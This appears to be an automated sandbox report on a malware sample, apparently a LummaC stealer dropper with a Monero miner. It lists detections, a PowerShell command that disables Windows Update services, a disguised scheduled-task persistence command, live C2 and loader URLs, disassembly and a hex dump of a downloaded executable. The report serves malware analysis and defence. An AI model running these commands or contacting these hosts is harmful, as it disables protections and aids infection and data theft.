Source: Process started | Author: Jakob Weinzettl, oscd.community, Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 5540, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k NetworkService -p, ProcessId: 7852, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 2968, ProcessName: schtasks.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:18:01.336176+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49726 | 149.154.167.99 | 443 | TCP
2025-03-13T10:18:03.512943+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49727 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:05.152034+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49729 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:08.656005+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:11.500651+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:14.561650+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:23.986509+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49735 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:30.831166+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49736 | 104.21.32.1 | 443 | TCP
2025-03-13T10:18:36.848098+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:18:52.869589+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 147.45.124.241 | 80 | TCP
2025-03-13T10:18:57.326305+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49740 | 147.45.124.241 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-13T10:18:52.869589+0100 | 2829056 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.4 | 49740 | 147.45.124.241 | 80 | TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-03-13T10:18:49.797762+010028548021Domain Observed Used for C2 Detected185.236.26.1115968192.168.2.449739TCP

AV Detection

Source: http://138.124.55.36/loader/1/file3.exe | Avira URL Cloud: Label: malware
Source: menuedgarli.shop/AUIqn | Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/AUIqn | Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/ | Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/AUIqnl | Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/AUIqnq | Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/eE4 | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | Avira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Avira: detection malicious, Label: TR/Crypt.Agent.ivuts
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | Avira: detection malicious, Label: TR/Spy.ClipBanker.bwbhz
Source: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe | Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
Source: C:\ProgramData\WinUpdate32\RuntimeBroker.exe | ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe | ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe | ReversingLabs: Detection: 45%
Source: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe | ReversingLabs: Detection: 45%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.2% probability
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: menuedgarli.shop/AUIqn
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: featureccus.shop/bdMAn
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: mrodularmall.top/aNzS
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: jowinjoinery.icu/bdWUa
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: legenassedk.top/bdpWO
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: htardwarehu.icu/Sbdsa
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cjlaspcorne.icu/DbIps
Source: 0000001C.00000002.1399233398.0000000002240000.00000004.00000020.00020000.00000000.sdmp | String decryptor: bugildbett.top/bAuz
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0041BAC1 CryptUnprotectData,CryptUnprotectData,CryptUnprotectData, | 29_2_0041BAC1

Bitcoin Miner

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 64.0.RtkAudUService64a.exe.7ff728030000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000002.2492130397.00000021331BA000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match | File source: 00000041.00000002.2494603191.0000024811FC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000002.2496546660.000001FE48C10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000002.2496546660.000001FE48C4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000002.2496546660.000001FE48C1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000040.00000002.2496546660.000001FE48CFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RtkAudUService64a.exe PID: 4132, type: MEMORYSTR
Source: unknown | DNS query: name: xmr-eu1.nanopool.org
Source: Launcher.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: Launcher.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASM source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Users\szska\.nexe\16.20.2\out\Release\node.pdb source: Launcher.exe, 00000000.00000000.1238969388.000000000334D000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: !"#$% !"#$%&'()*+,-./0123456789:;<=>?@ABCD./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyzdes(long)compiler: cc /Zi /Fdossl_static.pdb -DOPENSSL_IA32_SSE2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAES_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPADLOCK_ASM -DPOLY1305_ASMbuilt on: Sun Aug 6 12:30:37 2023 UTCplatform: OPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "NUL"QUICnot available@@@@@@@@@hHHHH@@@@@@@@@@@@@@@@@@( source: Launcher.exe, 00000000.00000001.1242595360.0000000001386000.00000002.00000001.01000000.00000003.sdmp
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021FCDE FindFirstFileExW, | 28_2_0021FCDE
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 28_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 28_2_0021FD8F
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021FCDE FindFirstFileExW, | 29_2_0021FCDE
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 29_2_0021FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose, | 29_2_0021FD8F
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch] | 29_2_00442800
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh] | 29_2_0040D830
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-30h] | 29_2_004490C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edi, byte ptr [ebx+ecx] | 29_2_0044816C
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov dword ptr [esp], eax | 29_2_00410993
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h] | 29_2_0041BAC1
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch] | 29_2_0041BAC1
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ebp+02h] | 29_2_00429460
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov word ptr [ecx], dx | 29_2_00448CC3
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then lea edi, dword ptr [eax-0000008Ah] | 29_2_0044BCE0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp word ptr [edi+ebx], 0000h | 29_2_0044AE40
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then push edi | 29_2_00411E2A
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch] | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah] | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch] | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h | 29_2_00420EA0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h] | 29_2_0042F760
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] | 29_2_0042F760
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then lea ebp, dword ptr [edx+ecx] | 29_2_0042F760
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then inc ebx | 29_2_00401040
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov dword ptr [esp], edx | 29_2_0044B840
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah] | 29_2_00431850
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov eax, ebx | 29_2_00424030
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov word ptr [eax], dx | 29_2_004208F5
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then jmp dword ptr [00451774h] | 29_2_0041F888
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov word ptr [eax], dx | 29_2_00420091
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h] | 29_2_004288A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h | 29_2_004288A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov word ptr [eax], cx | 29_2_004288A0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov byte ptr [ecx], al | 29_2_0041312E
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov word ptr [ecx], si | 29_2_004201C3
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 29_2_0040A1E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 29_2_0040A1E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx eax, byte ptr [ecx+esi] | 29_2_0040B240
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h] | 29_2_004112E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h | 29_2_0042031B
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh] | 29_2_0040D3D0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov dword ptr [esi+04h], edx | 29_2_004113E2
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then push edi | 29_2_004313F7
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah] | 29_2_0042FB80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movsx edx, byte ptr [esi+eax] | 29_2_0041AC10
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh | 29_2_0041ACD0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh | 29_2_0041ACD0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh] | 29_2_0040C4E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then and esi, 80000000h | 29_2_0040BC80
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then push ebx | 29_2_0041FC88
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ebx+10h] | 29_2_0040FCB0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov dword ptr [esp+18h], ecx | 29_2_0041D4B8
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax] | 29_2_00444542
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 29_2_0043FD70
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 29_2_00446D30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h] | 29_2_00446D30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax] | 29_2_00446D30
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h] | 29_2_0042FDCC
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h] | 29_2_004485D1
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] | 29_2_0042ED90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh] | 29_2_0042ED90
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h] | 29_2_0041E5BB
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov byte ptr [edx], al | 29_2_00423612
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 29_2_004336C0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h] | 29_2_004236E0
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h] | 29_2_004326FC
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then mov byte ptr [ecx], al | 29_2_00437682
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h] | 29_2_00432E9E
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then push edi | 29_2_00431775
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx esi, byte ptr [edx] | 29_2_00431FCA
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 29_2_00402780
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h] | 29_2_0041EF9E
Source: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax] | 29_2_0043F7B0

Networking

Source: Network traffic | Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 185.236.26.111:5968 -> 192.168.2.4:49739
Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 185.236.26.111 5968
Source: Malware configuration extractor | URLs: menuedgarli.shop/AUIqn
Source: Malware configuration extractor | URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor | URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor | URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor | URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor | URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor | URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor | URLs: bugildbett.top/bAuz
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 3000
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 3000
Source: unknown | Network traffic detected: HTTP traffic on port 3000 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 3000 -> 49718
Source: global traffic | TCP traffic: 192.168.2.4:49718 -> 185.170.153.104:3000
Source: global traffic | TCP traffic: 192.168.2.4:49719 -> 5.252.153.122:3000
Source: global traffic | TCP traffic: 192.168.2.4:49739 -> 185.236.26.111:5968
Source: global traffic | TCP traffic: 192.168.2.4:49742 -> 51.15.58.224:10343
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Mar 2025 09:17:57 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Wed, 12 Mar 2025 11:54:14 GMTETag: "14c200-63023dd3da07b"Accept-Ranges: bytesContent-Length: 1360384Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 b6 9b d0 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 9c 08 00 00 fe 00 00 00 00 00 00 82 e6 06 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 14 00 00 08 00 00 00 00 00 00 03 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 36 09 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9e 09 00 40 45 00 00 00 a0 09 00 5c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 fb 08 00 18 00 00 00 98 bf 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 c0 37 09 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 9a 08 00 00 10 00 00 00 9c 08 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 a0 00 00 00 b0 08 00 00 a2 00 00 00 a4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 5c 2c 00 00 00 60 09 00 00 16 00 00 00 46 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 90 09 00 00 02 00 00 00 5c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 5c 43 00 00 00 a0 09 00 00 44 00 00 00 5e 09 00 00 00 00 00 
